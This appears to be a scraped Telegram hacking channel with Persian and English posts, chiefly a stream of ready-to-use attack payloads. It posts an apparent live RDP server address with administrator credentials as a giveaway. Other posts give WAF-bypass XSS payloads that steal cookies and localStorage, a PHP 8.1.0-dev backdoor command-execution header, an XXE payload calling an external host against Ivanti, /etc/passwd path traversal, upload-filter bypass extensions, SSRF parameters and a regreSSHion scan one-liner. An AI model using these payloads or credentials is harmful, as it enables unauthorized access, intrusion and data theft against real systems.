Eʀᴏ ··ʜᴀᴄᴋ··
⭕️ برای استارت مسابقه فعلا یه سرور مجازی قرار بدیم، اگر حمایت شما بیشتر بدونه فاصله دوباره مسابقه میزاریم.🎁 زمان مسابقه 8 شب🎁 🎺 برای برگزاری مسابقه ریاکشن بزارید و چنل رو برای دوستاتون بقرستید🎺
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7💯3👍1
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «⭕️ برای استارت مسابقه فعلا یه سرور مجازی قرار بدیم، اگر حمایت شما بیشتر بدونه فاصله دوباره مسابقه میزاریم. 🎁 زمان مسابقه 8 شب🎁 🎺 برای برگزاری مسابقه ریاکشن بزارید و چنل رو برای دوستاتون بقرستید🎺 »
Eʀᴏ ··ʜᴀᴄᴋ··
⭕️ ریاکشن زیر این پست فراموش نشه!⭕️ قرعهکشی ساعت 8 برگزار میشه.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7💯2🔥1
⭕️ صدای چنل رو باز کنید که رأس ساعت ۸ جایزه رو میزارم☠️
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥3
89.185.85.70:3389
administrator
parsa2002@!@!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4👍1💯1
<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload=alert%26%230000000040"")>
<svg onx=() onload=(confirm)(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
#Payload #Cloudflare #Pentest
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡4🔥2💯2😐1
nmap -sV -Pn -p22 -iL servers.txt | awk '/Nmap scan report/{ip=$5} /OpenSSH/ {
if ($5 >= "8.5p1" && $5 < "9.8p1") {
status = "Vulnerable to CVE-2024-6387"
} else if ($5 >= "4.4p1" && $5 < "8.5p1") {
status = "Not vulnerable to CVE-2024-6387 (patched for CVE-2006-5051)"
} else if ($5 < "4.4p1") {
status = "Vulnerable to regreSSHion (unless patched for CVE-2006-5051 and CVE-2008-4109)"
}
if (status) {
print "Server: "ip"\t", "OpenSSH Version: "$5"\t", "Status: "status
status = ""
}
}'
#POC #CVE_2024_6387
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7⚡2😐2
بدون شک جاوااسکریپت جز سه زبان محبوب در کل دنیاست. آینده دار، بازار کار قوی و قدرت فوقالعاده...
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6🔥1💯1
Top 25 SSRF parameters 🔓 💀
🚫 🚫 🚫 🚫 🚫 🚫 🚫 🚫 🚫 🚫
🌐 EroHack
👍 Boost
🖥 Twitter
• ?dest={target}
• ?redirect={target}
• ?uri={target}
• ?path={target}
• ?continue={target}
• ?url={target}
• ?window={target}
• ?next={target}
• ?data={target}
• ?reference={target}
• ?site={target}
• ?html={target}
• ?val={target}
• ?validate={target}
• ?domain={target}
• ?callback={target}
• ?return={target}
• ?page={target}
• ?feed={target}
• ?host={target}
• ?port={target}
• ?to={target}
• ?out={target}
• ?view={target}
• ?dir={target}
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥7⚡1👍1
PHP
→ .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module
ASP → .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp → .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion → .cfm, .cfml, .cfc, .dbm
Perl → .pl, .cgi
Using random capitalization → .pHp, .pHP5, .PhAr
file.png.php
file.png.Php5
file.php%20
file.php%0a
file.php%00
file.php%0d%0a
file.php/
file.php.\
file.
file.php....
file.pHp5....
file.png.php
file.png.pHp5
file.php#.png
file.php%00.png
file.php\x00.png
file.php%0a.png
file.php%0d%0a.png
file.phpJunk123png
file.png.jpg.php
file.php%00.png%00.jpg
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6⚡1🔥1🤣1
ابزار nikto برای اسکن وب سرورها و یافتن آسیب پذیری در برنامه های تحت وب است. این ابزار توانایی تجزیه و تحلیل سرورهای وب برای آسیب پذیری های شناخته شده، دایرکتوری های مخفی، فایل ها و سایر آبجکت های خطرناک را فراهم می کند.
— این ابزار به طور فعال توسط جامعه امنیت اطلاعات توسعه یافته و برای اطمینان از کارایی بالا در تشخیص آسیب پذیری ها به روز شده است. ابزار nikto به دلیل انعطاف پذیری و طیف گسترده ای از ویژگی ها، یکی از محبوب ترین ابزارها برای ممیزی امنیت برنامه های وب است.
#Vulnerability #Fuzzing
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6⚡1👍1💯1
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡6🔥2
Find a server running PHP 8.1.0-dev
💀 Check for easy RCE 💀
🖥 Payload
#bugbountytips #bugbounty
⚙ ⚙ ⚙ ⚙ ⚙ ⚙ ⚙ ⚙ ⚙
🌐 EroHack
👍 Boost
🖥 Twitter
User-Agentt: zerodiumsleep(5);
User-Agentt: zerodiumsystem('id');
#bugbountytips #bugbounty
Please open Telegram to view this post
VIEW IN TELEGRAM
👍7😐1🗿1
𝗢𝗿𝗶𝗴𝗶𝗻𝗮𝗹 𝗨𝗥𝗟:
"target/lib/css/animated.min.css"
𝗫𝗦𝗦 𝗙𝗼𝘂𝗻𝗱 𝗶𝗻:
"/lib/css/animated.min'"/><script%20>alert(document.domain)<%2fscript>.css"
#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥6👍2
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "http://{{external-host}}/x"> %xxe;]><r></r>
127.0.0.1/dana-na/auth/saml-sso.cgi with SAMLRequest parm
#bugbountytips #cve #Ivanti
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯5💯3🗿1
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
#bugbountytips #bugbounty #CyberSecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
👍8🔥1💯1